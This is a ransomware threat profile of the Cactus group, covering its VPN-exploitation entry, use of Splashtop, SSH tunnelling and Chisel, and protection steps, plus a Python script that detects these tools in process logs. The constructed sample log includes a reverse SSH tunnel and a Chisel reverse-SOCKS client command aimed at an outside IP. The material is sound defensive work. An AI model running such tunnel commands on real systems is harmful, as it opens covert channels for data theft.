Ransomware Group
Cactus
Also known as: Cactus Ransomware
Status: active • First seen 2023-03 • 150+ known victims
Cactus ransomware is sneaky. Its main trick is that the ransomware binary encrypts itself before running, so antivirus can't recognize it as malicious. The operators get in through vulnerable VPNs (especially Fortinet) and use legitimate IT tools to move around your network. By the time you notice, they've already stolen your data.
Overview
Cactus is a sophisticated ransomware operation known for exploiting VPN vulnerabilities to gain initial access. What makes Cactus unique is that their ransomware binary encrypts itself to evade antivirus detection. They also use legitimate tools for persistence and lateral movement.
Target Industries
Manufacturing, Professional Services, Technology, Retail, Healthcare, Energy
How They Attack
- Exploiting Fortinet VPN vulnerabilities
- Using a self-encrypting ransomware binary
- Splashtop for remote access
- SSH tunneling for data exfiltration
- Using Chisel for network tunneling
Notable Victims
Schneider Electric (2024), various manufacturing companies, multiple professional services firms, several technology companies
How to Protect Against Cactus
1. Patch Fortinet VPN devices immediately (CVE-2023-27997, etc.)
2. Monitor for unauthorized Splashtop installations
3. Block SSH tunneling from non-authorized systems
4. Deploy EDR with memory scanning capabilities
5. Monitor for Chisel tool usage on network
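Steps 2, 3 and 5 above are detection problems: they come down to watching process-creation telemetry for Splashtop on hosts that should not have it, SSH launched with tunnelling options from hosts that are not approved to tunnel, and any execution of Chisel. The script below is an added example of that detection logic and is not code from the original page or from any vendor. The pipe-delimited log format, the host names, the IP addresses (documentation range) and the two allow-lists are all constructed for the example; a real deployment would read the same fields from EDR or Sysmon process-creation events and take the allow-lists from an asset inventory.

```python
"""Detect the Cactus tradecraft named in the protection list from process-creation logs.

Rules (all constructed for this example):
  splashtop-unapproved-host  - Splashtop image or command line on a host not approved for remote access
  ssh-tunnel-unapproved-host - ssh started with -L / -R / -D / -w from a host not approved to tunnel
  chisel-execution           - any execution of the Chisel tunnelling binary
"""
import shlex
from dataclasses import dataclass
from pathlib import PurePosixPath, PureWindowsPath
from typing import List, Optional

# Constructed allow-lists (assumption: replace with your asset inventory / jump-host list).
APPROVED_REMOTE_ACCESS_HOSTS = {"helpdesk-01"}
APPROVED_SSH_TUNNEL_HOSTS = {"bastion-01"}

SSH_IMAGES = {"ssh", "ssh.exe"}
CHISEL_IMAGES = {"chisel", "chisel.exe"}
# OpenSSH options that establish a tunnel: -L local, -R remote, -D dynamic (SOCKS), -w tun device.
SSH_TUNNEL_FLAGS = set("LRDw")

# Constructed sample telemetry: timestamp|host|user|image path|command line
SAMPLE_LOG = r"""
2024-05-02T10:14:03Z|ws-fin-07|jdoe|C:\Users\jdoe\AppData\Local\Temp\SplashtopStreamer.exe|SplashtopStreamer.exe /silent
2024-05-02T10:20:41Z|helpdesk-01|svc_helpdesk|C:\Program Files\Splashtop\Streamer.exe|Streamer.exe
2024-05-02T11:02:17Z|app-db-03|root|/usr/bin/ssh|ssh -fN -R 8443:127.0.0.1:443 relay@203.0.113.10
2024-05-02T11:05:55Z|bastion-01|ops|/usr/bin/ssh|ssh -L 5432:db-internal:5432 ops@app-db-03
2024-05-02T11:30:09Z|app-db-03|root|/usr/bin/ssh|ssh -p 2222 admin@app-db-04
2024-05-02T12:45:22Z|ws-eng-12|jsmith|C:\Windows\Temp\chisel.exe|chisel.exe client 203.0.113.10:8080 R:socks
2024-05-02T13:10:00Z|ws-eng-12|jsmith|C:\Windows\System32\notepad.exe|notepad.exe notes.txt
"""


@dataclass
class Finding:
    rule: str
    host: str
    user: str
    cmdline: str


def image_basename(image: str) -> str:
    """Lower-cased file name of the image, for both Windows and POSIX paths."""
    if "\\" in image:
        return PureWindowsPath(image).name.lower()
    return PurePosixPath(image).name.lower()


def has_ssh_tunnel_flag(cmdline: str) -> bool:
    """True if any short-option cluster (e.g. '-R', '-fNR', '-L8080:...') contains a tunnel flag.

    Only the letters of the cluster are inspected, so a value glued onto the option
    ('-R8443:...') still counts, while long options and plain arguments are ignored.
    """
    try:
        tokens = shlex.split(cmdline)
    except ValueError:  # unbalanced quotes; fall back to whitespace splitting
        tokens = cmdline.split()
    for tok in tokens:
        if tok.startswith("-") and not tok.startswith("--"):
            letters = ""
            for ch in tok[1:]:
                if not ch.isalpha():
                    break
                letters += ch
            if SSH_TUNNEL_FLAGS & set(letters):
                return True
    return False


def parse_line(line: str) -> Optional[dict]:
    """Split one constructed log line into its five fields; None if malformed."""
    parts = line.rstrip("\n").split("|", 4)
    if len(parts) != 5:
        return None
    ts, host, user, image, cmdline = parts
    return {"ts": ts, "host": host, "user": user, "image": image, "cmdline": cmdline}


def evaluate(rec: dict) -> Optional[Finding]:
    """Apply the three rules to one parsed record."""
    base = image_basename(rec["image"])
    haystack = (rec["image"] + " " + rec["cmdline"]).lower()
    if "splashtop" in haystack:
        if rec["host"] not in APPROVED_REMOTE_ACCESS_HOSTS:
            return Finding("splashtop-unapproved-host", rec["host"], rec["user"], rec["cmdline"])
        return None
    if base in CHISEL_IMAGES:
        return Finding("chisel-execution", rec["host"], rec["user"], rec["cmdline"])
    if base in SSH_IMAGES and has_ssh_tunnel_flag(rec["cmdline"]):
        if rec["host"] not in APPROVED_SSH_TUNNEL_HOSTS:
            return Finding("ssh-tunnel-unapproved-host", rec["host"], rec["user"], rec["cmdline"])
    return None


def scan(log_text: str) -> List[Finding]:
    """Run every rule over every well-formed line and return the findings in log order."""
    findings: List[Finding] = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = parse_line(line)
        if rec is None:
            continue
        finding = evaluate(rec)
        if finding is not None:
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"[{f.rule}] host={f.host} user={f.user} cmd={f.cmdline}")
```

Against the constructed sample the scan raises three findings: the Splashtop streamer dropped in a user's Temp directory on a finance workstation, the reverse SSH tunnel started from the database host, and the Chisel client on an engineering workstation; the approved helpdesk host's Splashtop and the bastion's forward tunnel are deliberately silent. The allow-lists are what keep the rules from drowning a SOC in noise, so they should be maintained as tightly as the firewall rules that step 3 implies.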
MITRE ATT&CK Techniques